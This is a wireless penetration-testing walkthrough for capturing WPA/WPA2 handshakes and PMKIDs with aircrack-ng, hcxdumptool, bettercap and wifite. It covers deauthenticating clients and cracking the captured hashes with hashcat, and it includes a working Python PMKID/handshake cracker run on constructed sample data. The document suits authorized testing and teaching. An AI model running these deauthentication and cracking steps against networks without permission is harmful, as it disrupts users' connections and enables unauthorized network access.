# Wireless Pentesting

This is a walkthrough for obtaining WPA/WPA2 handshakes and [PMKID](https://hashcat.net/forum/thread-7717.html)s using various tools such as Aircrack-ng, HCXDumptool, Bettercap, and [Wifite](https://github.com/kimocoder/wifite2).

Then we will crack the resulting hashes using [Hcxtools](https://github.com/ZerBea/hcxtools) and Hashcat.

This requires a WiFi adapter whose driver supports monitor mode (capturing raw 802.11 frames) and packet injection (sending frames such as deauthentications). These are two separate capabilities, not two names for the same thing: the capture steps below only need monitor mode, while the deauth and rogue-AP steps also need injection.

I myself have and recommend these adapters:

* [Alfa AWUS036ACM](https://www.amazon.com/Alfa-AWUS036ACM-Long-Range-Dual-Band-Wireless/dp/B073X6RL9D) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACHM](https://www.amazon.com/gp/product/B08SJBV1N3/ref=ox_sc_act_title_1?smid=A20G3A026MV70R\&psc=1) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACH](https://www.amazon.com/dp/B08SJC78FH?ref_=cm_sw_r_cp_ud_dp_PSZZG6J9X0XH40GXB685) <-- Capable of 2.4GHz and 5GHz (This more than likely *will* require driver installation)
* [Panda Wireless PAU09 N600](https://www.amazon.com/Panda-Wireless-PAU09-Adapter-Antennas/dp/B01LY35HGO) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036NEH](https://www.amazon.com/AWUS036NEH-Range-WIRELESS-802-11b-USBAdapter/dp/B0035OCVO6)
* [Alfa AWUS036NH](https://www.amazon.com/Alfa-AWUS036NH-802-11g-Wireless-Long-Range/dp/B003YIFHJY)
* [Panda Wireless PAU05](https://www.amazon.com/Panda-300Mbps-Wireless-USB-Adapter/dp/B00EQT0YK2)
* [TP-Link TL-WN722N](https://www.amazon.com/TP-Link-TL-WN722N-Wireless-network-Adapter/dp/B002SZEOLG)
* [Ralink USB WiFi RT5370](https://www.amazon.com/Ralink-RT5370-Raspberry-Adapter-Function/dp/B019XUDHFC)

## Aircrack-ng

Find your interface. If you have one network card (capable of monitor mode/packet injection) it will usually be `wlan0`; a second wireless USB dongle will most likely be `wlan1`. `iw dev` also lists wireless interfaces if `iwconfig` is not installed.

```
iwconfig
```

!\[\[image 243.png]]

Put the interface into monitor mode. `airmon-ng` renames it to `wlan1mon`; if NetworkManager or wpa_supplicant keep resetting the card, run `sudo airmon-ng check kill` first.

```shell-session
sudo airmon-ng start wlan1
```

!\[\[image 244.png]]

Now we scan for networks and connected clients to do some recon.

```
sudo airodump-ng wlan1mon
```

!\[\[image 245.png]]

Once we have found our target(s), we press `CTRL+C` to stop the scan.

Now we focus our scan on the target's channel and write the capture to disk.

```
sudo airodump-ng wlan1mon -c CH# --essid "SSID" -w outfile
```

!\[\[image 246.png]]

We can name the .cap file whatever we want; I typically just name it the target's SSID. `-w outfile` produces `outfile-01.cap` (plus `.csv` and `.kismet.*` files), and the number increments each time airodump-ng is started with the same prefix.

The lower section of the display lists associated clients: `BSSID`, `STATION`, `PWR`, `Rate`, `Lost`, etc. A `STATION` entry under the target's BSSID means a device is connected and can be deauthenticated. This may not *always* show devices but it is worth keeping an eye on.

At this point we can either wait for a device to connect to the network and capture the 4-way handshake passively, or send deauthentication frames so that a connected client reconnects and performs the handshake while we are listening. Deauth only helps if a client is actually connected; an AP with no clients produces no handshake. We can do this in various ways.

In a second terminal we send 10 rounds of deauthentication frames to the network and stop (`-0 0` would send them indefinitely).

```
sudo aireplay-ng -0 10 -a BSSID wlan1mon
```

!\[\[image 247.png]]

We can also deauthenticate a specific device that is connected to the network with

```
sudo aireplay-ng -0 10 -a BSSID -c STATION wlan1mon
```

!\[\[image 248.png]]

Once we have obtained the handshake, we will see our airodump terminal change: it shows `WPA handshake: BSSID` in the top right.

!\[\[image 249.png]]

Note: recent airodump-ng versions also flag a captured PMKID in the same place when the AP includes one in the first EAPOL message. Only some APs do, which is what the HCXDumptool section is about.

The handshake is saved in the .cap file we specified with `-w` when we targeted our airodump-ng scan. Once we have a handshake from aircrack-ng, we want to turn it into a hashcat-compatible file. First we extract the handshake from the .cap file:

```
sudo aircrack-ng -j handshake capture.cap
```

`-j` writes the older `.hccapx` format (hashcat `-m 2500`), which newer hashcat releases have deprecated in favour of the `22000` hash-line format produced by `hcxpcapngtool`.

!\[\[image 250.png]]

OR using `hcxpcapngtool` from Hcxtools (not HCXDumptool), which writes the `22000` format hashcat uses for both PMKIDs and handshakes:

```
sudo hcxpcapngtool -o SSIDHash outfile.cap
```

!\[\[image 251.png]]

!\[\[image 252.png]]

***

## HCXDumptool

This depends on which version you have installed. E.g. v6.2.9 has a different interface than v6.3.0+. I'll be going with the most up-to-date (currently v6.3.5).

**This attack is not guaranteed!** Not all access points (APs) send a PMKID; the PMKID attack only works when the AP includes one in the first EAPOL message, BUT hcxdumptool can still capture EAPOL M1M2M3 or M1M2M3M4 handshakes, which hashcat cracks the same way.

[Info on PMKID on Hashcat Forums](https://hashcat.net/forum/thread-7717.html)

Like the other methods, we find our interface and put it into monitor mode. For v6.3.0+ note that hcxdumptool expects NetworkManager and wpa_supplicant to be stopped (`sudo airmon-ng check kill` does this) and prints warnings at startup if they are still interfering.

```shell-session
sudo airmon-ng start wlan1
```

### HCXDumptool v6.2.9

```
sudo hcxdumptool -o (name).pcapng -i (interface) --enable_status=1 --filterlist_ap=target.txt --filtermode=2
```

`target.txt` holds one target BSSID per line; `--filtermode=2` treats that list as attack targets (`1` would protect them instead).

!\[\[image 253.png]]

Once we obtain our PMKID we will see it at the bottom

!\[\[image 254.png]]

We MAY see `PMKID:XXXXXXXXXXXXXXX` or `PMKIDROGUE:XXXXXXXXXXXXXXX`, and potentially `M1M2ROGUE:XXXXXXXXXXXXXXX`.

* `PMKID:XXXXXXXXXXXXXXX KDV:2` means we captured a PMKID from a real AP/client exchange. KDV is the Key Descriptor Version; 2 means WPA2 (HMAC-SHA1-128 MICs). We can recover the password from this.
* `PMKIDROGUE:XXXXXXXXXXXXXXX KDV:2` means the PMKID was requested by hcxdumptool itself (it associated to the AP), not by a real CLIENT. We can recover the password from this.
* `M1M2ROGUE:XXXXXXXXXXXXXXX` means hcxdumptool acted as a rogue AP and a CLIENT answered its EAPOL M1 with an M2, so we hold an M1/M2 pair without involving the real ACCESS POINT. We can recover the password from this.

### HCXDumptool v6.3.0+

To target AP(s) we scan for target(s) with airodump-ng

```
sudo airodump-ng wlan1mon
```

!\[\[image 255.png]]

Grab the BSSID(s) of our targets and compile them into a Berkeley Packet Filter (BPF) `.bpf` file with either tcpdump or hcxdumptool. `wlan addr3` matches the BSSID field of 802.11 frames, so frames in both directions for that AP pass the filter.

TCPDump

```
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf
```

!\[\[image 256.png]]

HCXDumptool

```
hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf
```

**Note:** we can target multiple APs by OR-ing the clauses.

TCPDump:

```
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf
```

HCXDumptool:

```
hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf
```
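
The following Python script, added here as an example (it is not part of hcxdumptool, tcpdump or the original page), builds that `wlan addr3 ... or wlan addr3 ...` expression from a list of BSSIDs after validating and de-duplicating them, then hands it to `tcpdump -ddd` to produce the `.bpf` file when tcpdump is installed. A typo in a hand-written filter silently means "capture nothing", which is why the validation is worth the few lines. The MAC addresses and the `targets.bpf` filename are constructed placeholders.

```python
"""Build and compile an hcxdumptool 6.3+ target BPF from a list of BSSIDs.
Added example, not hcxdumptool code. Standard library only."""
import re
import shutil
import subprocess
from typing import Iterable, List

# aa:bb:cc:dd:ee:ff, AA-BB-CC-DD-EE-FF or aabbccddeeff
_MAC = re.compile(r"^([0-9A-Fa-f]{2})[:-]?([0-9A-Fa-f]{2})[:-]?([0-9A-Fa-f]{2})[:-]?"
                  r"([0-9A-Fa-f]{2})[:-]?([0-9A-Fa-f]{2})[:-]?([0-9A-Fa-f]{2})$")


def normalize_mac(mac: str) -> str:
    """Validate a MAC address and return it in lower-case colon form."""
    m = _MAC.match(mac.strip())
    if not m:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(g.lower() for g in m.groups())


def bpf_expression(bssids: Iterable[str]) -> str:
    """One 'wlan addr3 <bssid>' clause per target AP, OR-ed together.
    addr3 is the BSSID field, so traffic to and from every target passes."""
    seen: List[str] = []
    for b in bssids:
        n = normalize_mac(b)
        if n not in seen:  # duplicates would only bloat the compiled filter
            seen.append(n)
    if not seen:
        raise ValueError("no target BSSIDs given")
    return " or ".join(f"wlan addr3 {m}" for m in seen)


def compile_bpf(expr: str, out_path: str) -> bool:
    """Compile with tcpdump into the -ddd listing hcxdumptool --bpf= expects.
    Returns False (and writes nothing) when tcpdump is not installed."""
    if shutil.which("tcpdump") is None:
        return False
    res = subprocess.run(
        ["tcpdump", "-s", "65535", "-y", "IEEE802_11_RADIO", "-ddd", expr],
        capture_output=True, text=True, check=True)
    with open(out_path, "w") as fh:
        fh.write(res.stdout)
    return True


if __name__ == "__main__":
    # Constructed target list, not real networks; the duplicate is dropped.
    targets = ["00:11:22:33:44:55", "AA-BB-CC-DD-EE-FF", "00:11:22:33:44:55"]
    expr = bpf_expression(targets)
    print(expr)
    print("compiled:", compile_bpf(expr, "targets.bpf"))
```

Then run `sudo hcxdumptool --rds=1 -F --bpf=targets.bpf -i wlan1mon -w outfile.pcapng` as in the next step.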

Now run it against our target

```
sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan1mon -w outfile.pcapng
```

***

To target all APs in range (not recommended without explicit permission for every network, since the deauth and rogue frames will hit all of them):

```shell-session
sudo hcxdumptool -i wlan1mon -w outfile.pcapng
```

After a while we may see a `+` under the `3` (EAPOL M1M2M3 captured) or `P` (PMKID captured) column of our target. Either can be used to obtain the password with hashcat.

***

## Bettercap

### Handshake

Like with aircrack, we find our interface and put it into monitor mode.

Now we start bettercap on that interface (if it is not already in monitor mode, bettercap will try to switch it when recon starts):

```
sudo bettercap -iface (interface)
```

We begin scanning for networks

```
wifi.recon on
```

We can also show the WiFi Manufacturer of the AP

```
set wifi.show.manufacturer true
```

```
wifi.show
```

Lock recon to the target's channel so we do not hop away while the handshake happens, then write everything we sniff to a pcap and watch the event stream:

```
set wifi.recon.channel (Channel)
set net.sniff.verbose true
set net.sniff.output (SSID).pcap
net.sniff on
events.stream on
```

`net.sniff on` is a module command, not a parameter, so it is not prefixed with `set`.

At this point we can again, simply wait for a device to connect to the network to obtain the handshake, or we may deauthenticate the network.

```
wifi.deauth (BSSID)
```

Once we obtain the handshake, we will see the notification in our event stream. Bettercap also writes every captured handshake to the file named by `wifi.handshakes.file` (default `~/bettercap-wifi-handshakes.pcap`), which `hcxpcapngtool` can convert directly.

### PMKID

The PMKID method is much simpler. Just like before, we find our interface, enable monitor mode, and start bettercap on that interface.

We begin scanning for networks

```
wifi.recon on
```

We can also show the WiFi Manufacturer of the AP

```
set wifi.show.manufacturer true
```

```
wifi.show
```

To start the PMKID attack we simply run

```
wifi.assoc (BSSID)
```

Once the RSN frame containing the PMKID has been received, bettercap logs it in the event stream and saves it to the handshakes pcap (`wifi.handshakes.file`), from which `hcxpcapngtool` can extract the `22000` hash.

## Wifite

Specify a wireless interface with

```
sudo wifite -i wlan0
```

OR, if we only have one WiFi interface that is capable of monitor mode, we can just run it as is.

We can do a WPA attack on a target network with

```
sudo wifite --wpa
```

This will enable monitor mode on the wireless interface and begin scanning for networks.

This starts with a PMKID attack, then moves onto a WPA Handshake attack if a PMKID is unable to be obtained.

\*Note, we can skip the PMKID attack by adding the argument `--no-pmkid`

During the WPA handshake attack, wifite repeatedly de-authenticates clients from the network until a handshake has been captured.

When the handshake is captured we see where it was saved to and its file name. Wifite will then attempt to crack it automatically with `aircrack-ng` using its default wordlist `wordlist-probably.txt`.

If you would like to use your own dictionary, such as `rockyou.txt` we can use the `--dict` argument.

## Hash Cracking

So we now have our handshake in .cap format, we can crack the hash and find out the password.

### Aircrack

We'll start with `aircrack-ng` as that is what we originally captured our handshake with. When we chose the `-w` output with the SSID name, or whatever name you chose, the files are saved in the directory you ran the `airodump-ng` command from. You may have multiple files there with that prefix, e.g. `Pixel.cap-01.cap`, `Pixel.cap-02.cap`, `Pixel.cap-03.cap`, etc., because airodump-ng increments the number on every run. The handshake *SHOULD* be in the run you deauthenticated during, normally the most recent one with the highest number. So let's run aircrack-ng against that .cap file.

```
sudo aircrack-ng -w (wordlist) (.cap file)
```

Now, depending on the password and the dictionary you chose, this may take some time. I chose to attack my phone's hotspot, as I am allowed to attack my own devices, and made the password simple enough that the basic rockyou.txt file could crack it with ease. Once it has found it, the cracking will stop and it will tell you the password.

### Hashcat

We have our PMKID or handshake in .pcapng (or .cap) format and can use hashcat to crack it. First we must convert it with `hcxpcapngtool` from [HCXtools](https://github.com/ZerBea/hcxtools), which writes one `22000` hash line per PMKID or handshake it finds.

```
sudo hcxpcapngtool -o SSIDHash outfile.cap (or .pcapng)
```

#### Dictionary

If we want to use a dictionary attack, like using `rockyou.txt` for example

```
sudo hashcat -m 22000 SSIDHash wordlist
```

Depending on your hardware, the dictionary you chose, and the password, this may take some time. Press `s` for a status update showing the estimated time remaining and the `Recovered` counter (cracked/total hashes).

We can run the same command again with `--show` appended to see our cracked passwords (hashcat keeps them in its potfile).
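
To make concrete what `-m 22000` verifies for each candidate, and why a PMKID (the HCXDumptool section above) is enough to crack without ever seeing a client handshake, here is a small standard-library Python verifier for both `22000` line types. It is an added example, not hashcat or hcxtools code; `TestNet`, the MAC addresses, the nonces and the synthetic EAPOL-Key frame are constructed sample data, and it is far too slow to use as a real cracker (one PBKDF2 per candidate, single-threaded).

```python
"""Minimal hashcat mode-22000 verifier for PMKID (WPA*01) and 4-way-handshake
(WPA*02) lines. Added example, not hashcat/hcxtools code. Sample data is constructed."""
import hashlib
import hmac
from typing import Iterable, Optional


def pmk(passphrase: str, essid: bytes) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This is the expensive step; everything after it is a couple of HMACs.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def pmkid(pmk_: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): no nonces, no client.
    return hmac.new(pmk_, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def kck(pmk_: bytes, mac_ap: bytes, mac_sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce));
    # only its first 16 bytes (the KCK) are needed to check the EAPOL MIC.
    data = min(mac_ap, mac_sta) + max(mac_ap, mac_sta) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes >= 64 bytes of PTK
        out += hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:16]


def eapol_mic(kck_: bytes, eapol: bytes) -> bytes:
    # Key Descriptor Version = low 3 bits of Key Information (frame bytes 5-6).
    kdv = int.from_bytes(eapol[5:7], "big") & 0x7
    if kdv == 1:  # WPA1/TKIP: HMAC-MD5
        return hmac.new(kck_, eapol, hashlib.md5).digest()
    if kdv == 2:  # WPA2/CCMP: HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck_, eapol, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {kdv}")  # 3 = AES-CMAC, not handled


def parse_22000(line: str) -> dict:
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        raise ValueError("not a hashcat 22000 hash line")
    return {"type": f[1], "digest": bytes.fromhex(f[2]), "ap": bytes.fromhex(f[3]),
            "sta": bytes.fromhex(f[4]), "essid": bytes.fromhex(f[5]),
            "anonce": bytes.fromhex(f[6]), "eapol": bytes.fromhex(f[7]), "msgpair": f[8]}


def check(h: dict, passphrase: str) -> bool:
    if not 8 <= len(passphrase) <= 63:  # WPA-PSK length rule: skip impossible candidates
        return False
    k = pmk(passphrase, h["essid"])
    if h["type"] == "01":
        return hmac.compare_digest(pmkid(k, h["ap"], h["sta"]), h["digest"])
    snonce = h["eapol"][17:49]  # Key Nonce field of the stored (MIC-zeroed) EAPOL-Key frame
    expected = eapol_mic(kck(k, h["ap"], h["sta"], h["anonce"], snonce), h["eapol"])
    return hmac.compare_digest(expected, h["digest"])


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    h = parse_22000(line)
    return next((w for w in wordlist if check(h, w)), None)


# --- constructed sample data (not a real capture) ----------------------------
ESSID = b"TestNet"
AP, STA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))


def make_pmkid_line(passphrase: str) -> str:
    d = pmkid(pmk(passphrase, ESSID), AP, STA).hex()
    return f"WPA*01*{d}*{AP.hex()}*{STA.hex()}*{ESSID.hex()}***"


def make_handshake_line(passphrase: str) -> str:
    # Synthetic EAPOL-Key M2 (RSN descriptor, Key Info 0x010a = MIC|Pairwise|KDV 2,
    # empty key data) with the MIC field zeroed, exactly as stored in a 22000 line.
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + (1).to_bytes(8, "big") + SNONCE
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    mic = eapol_mic(kck(pmk(passphrase, ESSID), AP, STA, ANONCE, SNONCE), eapol).hex()
    return f"WPA*02*{mic}*{AP.hex()}*{STA.hex()}*{ESSID.hex()}*{ANONCE.hex()}*{eapol.hex()}*02"


if __name__ == "__main__":
    words = ["password", "hunter2", "letmein1", "correct horse battery"]
    print(crack(make_pmkid_line("letmein1"), words))      # letmein1
    print(crack(make_handshake_line("letmein1"), words))  # letmein1
    print(crack(make_pmkid_line("notinthelist"), words))  # None
```

The PMKID path needs only the AP's first EAPOL message, which is why hcxdumptool can collect it by associating itself; the handshake path additionally needs both nonces and the client's M2 frame, which is what the deauth-and-recapture step is for. Both reduce to "derive the PMK, then one or two cheap HMACs", so the 4096-round PBKDF2 is what bounds hashcat's speed.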

#### Brute Force

If we want to run a brute-force (mask) attack rather than a dictionary attack, the command is similar:

```
hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l?l'
```

Replace the `?l` positions with whatever we deem fit. WPA/WPA2 passphrases are 8 to 63 characters long, so a mask with fewer than 8 positions can never match, and the keyspace grows exponentially with each position added.

* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s = space and `!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~`
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff

This will cover the basics of the hash cracking with hashcat but it can get SO much more advanced with hashcat.
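
Before launching a mask attack it pays to size it. This Python helper, added here as an example and not hashcat code, parses a mask using hashcat's built-in charsets above, computes its keyspace, flags masks that cannot be a valid WPA passphrase length, and estimates the worst-case runtime from an assumed rate (`HASH_RATE`, a placeholder you should replace with your own `hashcat -b -m 22000` figure). The masks in the demo are constructed.

```python
"""Keyspace and worst-case runtime of a hashcat mask for -a 3 -m 22000 planning.
Added example, not hashcat code. Charset sizes are hashcat's built-ins."""
from typing import List

CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "h": 16, "H": 16, "s": 33, "a": 95, "b": 256}
HASH_RATE = 400_000.0  # H/s: ASSUMED figure for one mid-range GPU; measure yours with hashcat -b


def parse_mask(mask: str) -> List[int]:
    """Return the number of candidates per position. '?x' is a built-in charset,
    '??' a literal '?', and any other character a literal (exactly one candidate)."""
    sizes: List[int] = []
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            sizes.append(1)
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        c = mask[i + 1]
        if c == "?":
            sizes.append(1)
        elif c in CHARSET_SIZES:
            sizes.append(CHARSET_SIZES[c])
        else:
            raise ValueError(f"unknown charset ?{c}")
        i += 2
    return sizes


def mask_keyspace(mask: str) -> int:
    total = 1
    for n in parse_mask(mask):
        total *= n
    return total


def wpa_mask_ok(mask: str) -> bool:
    """WPA/WPA2 passphrases are 8-63 characters; a mask outside that can never match."""
    return 8 <= len(parse_mask(mask)) <= 63


def worst_case_hours(mask: str, rate: float = HASH_RATE) -> float:
    return mask_keyspace(mask) / rate / 3600


if __name__ == "__main__":
    for m in ["?l?l?l?l?l?l?l", "?l?l?l?l?l?l?l?l", "?d?d?d?d?d?d?d?d",
              "Pixel?d?d?d?d", "?a?a?a?a?a?a?a?a"]:
        print(f"{m:20} wpa_len_ok={wpa_mask_ok(m)!s:5} keyspace={mask_keyspace(m):>22,} "
              f"worst_case={worst_case_hours(m):,.1f} h")
```

The seven-position mask is flagged as unusable, eight lower-case letters is a few hundred GPU-hours at the assumed rate, and eight of `?a` is far out of reach, which is why mask attacks on WPA are normally built around a known prefix or policy (`Pixel?d?d?d?d`) rather than run blind.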


